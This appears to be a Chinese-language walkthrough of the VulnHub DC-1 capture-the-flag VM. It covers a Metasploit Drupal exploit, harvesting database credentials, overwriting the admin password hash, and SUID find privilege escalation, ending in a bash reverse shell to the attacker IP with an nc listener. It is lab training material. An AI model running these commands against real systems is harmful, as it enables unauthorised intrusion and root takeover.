靶机DC1下载地址:https://www.vulnhub.com/entry/dc-1,292/
kali ip:192.168.70.129
靶机DC1IP:192.168.70.160
一、信息搜集
靶机ip发现
端口扫描
进行目录扫描,并没发现什么可以利用的目录
二、漏洞利用
使用msf查找drupal的漏洞
命令:search drupal
这里选择一个最新的漏洞,设置rhost即可
成功接收会话
查看flag1
所有好的cmd都需要一个配置文件,和你一样
查到drupal的配置文件所在目录为:/var/www/sites/default/
查看配置文件
暴力破解和字典攻击不是
*只有获得访问权限的方式(您将需要访问权限)。
- 您可以使用这些凭据执行哪些操作?
再往下看到mysql的账号密码
Username:dbuser Passwd:R0ck3t
使用python开一个交互式窗口并进行mysql连接
python -c ‘import pty; pty.spawn(“/bin/bash”)’
查询drupaldb数据库和表users
发现账号密码
发现密码是加密的,这里可以选择对账号的密码进行替换
www-data@DC-1:/var/www$ php scripts/password-hash.sh ycx
password: ycx hash:
S S SDmVn5QNQW0UeWa6YUX2dKoAlRmmo3KsYuEMb1OstHXhC0AMEwe5D
查看users的表结构
使用update将admin的数据进行替换
也可以使用脚本进行攻击,这样更方便一些
这里只测试了自带的重置密码
这里就修改成功了,登录一下网页试试看
在网页中的dashbroad找到flag3
特殊的 PERMS 将帮助找到 passwd - 但您需要 -exec 该命令来弄清楚如何获取shadow中的东西。
查看passwd和shadow文件
查看shadow权限不足
从passwd得知flag4
在flag4的账户中找到flag4
三、提权
可以使用LinEnum脚本进行扫描
使用find命令查找有root权限文件
发现命令find可以提权
find `which find` -exec whoami \;
#命令解释: 以find 命令 执行 whoami 命令。 # find (一个路径或文件必须存在) -exec 执行命令 (结束);
find反弹shell
find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.70.129/9999 0>&1 \;
使用nc接收反弹会话
nc -lvvp 9999